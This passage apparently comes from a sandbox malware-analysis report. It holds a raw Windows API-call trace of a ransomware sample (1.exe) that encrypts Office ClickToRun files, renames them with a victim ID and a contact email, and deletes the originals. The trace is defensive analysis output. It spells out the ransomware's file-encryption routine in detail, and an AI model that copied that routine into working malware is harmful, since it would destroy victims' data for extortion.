(hObject=0x24c) returned 1 [0068.677] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll")) returned 1 [0068.678] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.679] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=21184) returned 1 [0068.679] CloseHandle (hObject=0x24c) returned 1 [0068.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll")) returned 0x20 [0068.679] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.679] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.679] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.679] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72100) returned 1 [0068.679] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.679] ReadFile (in: hFile=0x24c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x52c0, lpOverlapped=0x0) returned 1 [0068.681] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x52d0, dwBufLen=0x52d0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x52d0) returned 1 [0068.681] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x52d0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x52d0, lpOverlapped=0x0) returned 1 [0068.683] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e00) returned 1 [0068.683] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.683] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60, dwBufLen=0x60 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60) returned 1 [0068.683] CryptDestroyKey (hKey=0xf71e00) returned 1 [0068.683] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x112, lpOverlapped=0x0) returned 1 [0068.683] CryptDestroyKey (hKey=0xf72100) returned 1 [0068.683] CloseHandle (hObject=0x24c) returned 1 [0068.683] CloseHandle (hObject=0x324) returned 1 [0068.684] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll")) returned 1 [0068.686] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.686] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.686] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=19136) returned 1 [0068.686] CloseHandle (hObject=0x324) returned 1 [0068.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll")) returned 0x20 [0068.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.687] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.687] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.687] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.687] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.687] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d40) returned 1 [0068.687] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.687] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4ac0, lpOverlapped=0x0) returned 1 [0068.689] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4ad0, dwBufLen=0x4ad0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4ad0) returned 1 [0068.689] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4ad0, lpOverlapped=0x0) returned 1 [0068.690] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71bc0) returned 1 [0068.690] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.690] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70, dwBufLen=0x70 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70) returned 1 [0068.691] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0068.691] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x122, lpOverlapped=0x0) returned 1 [0068.691] CryptDestroyKey (hKey=0xf71d40) returned 1 [0068.691] CloseHandle (hObject=0x324) returned 1 [0068.691] CloseHandle (hObject=0x24c) returned 1 [0068.692] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll")) returned 1 [0068.693] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.693] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.693] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=162880) returned 1 [0068.693] CloseHandle (hObject=0x24c) returned 1 [0068.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll")) returned 0x20 [0068.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.693] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.694] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.694] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=656088) returned 1 [0068.694] CloseHandle (hObject=0x24c) returned 1 [0068.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll")) returned 0x20 [0068.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.694] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.694] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=2054872) returned 1 [0068.695] CloseHandle (hObject=0x24c) returned 1 [0068.695] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe")) returned 0x20 [0068.695] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0068.695] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.695] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0068.695] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0068.695] ReadFile (in: hFile=0x24c, lpBuffer=0x3e5c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3e5c058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0068.698] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0xa739d, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0068.698] ReadFile (in: hFile=0x24c, lpBuffer=0x3e9c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3e9c058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0068.702] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x1b5ad8, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0068.702] ReadFile (in: hFile=0x24c, lpBuffer=0x3edc058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3edc058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0068.707] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa94 | out: phKey=0x38efa94*=0xf71d40) returned 1 [0068.707] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.707] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa48*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa48*=0xc0060) returned 1 [0068.708] CryptDestroyKey (hKey=0xf71d40) returned 1 [0068.708] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa70 | out: lpNewFilePointer=0x0) returned 1 [0068.708] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x38efa80, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa80*=0xc0112, lpOverlapped=0x0) returned 1 [0069.503] SetEndOfFile (hFile=0x24c) returned 1 [0069.506] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x1b5ad8, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0069.506] WriteFile (in: hFile=0x24c, lpBuffer=0x3f1c14a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c14a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0069.515] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0xa739d, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0069.515] WriteFile (in: hFile=0x24c, lpBuffer=0x3f1c14a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c14a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0069.518] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0069.518] WriteFile (in: hFile=0x24c, lpBuffer=0x3f1c14a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c14a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0069.519] CloseHandle (hObject=0x24c) returned 1 [0070.091] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0070.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0070.092] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=820416) returned 1 [0070.092] CloseHandle (hObject=0x24c) returned 1 [0070.092] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll")) returned 0x20 [0070.092] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0070.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0070.092] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0070.092] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0070.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268 [0070.093] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72100) returned 1 [0070.093] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0070.093] ReadFile (in: hFile=0x24c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xc84c0, lpOverlapped=0x0) returned 1 [0070.098] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc84d0, dwBufLen=0xc84d0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc84d0) returned 1 [0070.099] WriteFile (in: hFile=0x268, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xc84d0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xc84d0, lpOverlapped=0x0) returned 1 [0070.113] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a00) returned 1 [0070.113] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0070.113] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0070.113] CryptDestroyKey (hKey=0xf71a00) returned 1 [0070.113] WriteFile (in: hFile=0x268, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0070.113] CryptDestroyKey (hKey=0xf72100) returned 1 [0070.113] CloseHandle (hObject=0x24c) returned 1 [0070.114] CloseHandle (hObject=0x268) Thread: id = 40 os_tid = 0xcf4 Thread: id = 41 os_tid = 0xfa0 Process: id = "2" image_name = "1.exe" filename = "c:\\users\\fd1hvy\\desktop\\1.exe" page_root = "0x70cdb000" os_pid = "0x3a8" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xc48" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\1.exe\"" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5 os_tid = 0x4d0 [0034.805] GetStartupInfoW (in: lpStartupInfo=0xcff768 | out: lpStartupInfo=0xcff768*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0034.805] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0034.805] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2af0000 [0034.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0034.810] GetProcAddress (hModule=0x75e90000, lpProcName="FlsAlloc") returned 0x75ea4ae0 [0034.810] GetProcAddress (hModule=0x75e90000, lpProcName="FlsGetValue") returned 0x75ea4b20 [0034.810] GetProcAddress (hModule=0x75e90000, lpProcName="FlsSetValue") returned 0x75ea4b40 [0034.810] GetProcAddress (hModule=0x75e90000, lpProcName="FlsFree") returned 0x75ea4b00 [0034.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x214) returned 0x2af05a8 [0034.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0034.811] GetCurrentThreadId () returned 0x4d0 [0034.811] GetStartupInfoW (in: lpStartupInfo=0xcff704 | out: lpStartupInfo=0xcff704*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x9b726a, hStdOutput=0x9b75a3, hStdError=0x2af05a8)) [0034.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x800) returned 0x2af07c8 [0034.811] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.811] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.811] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.811] SetHandleCount 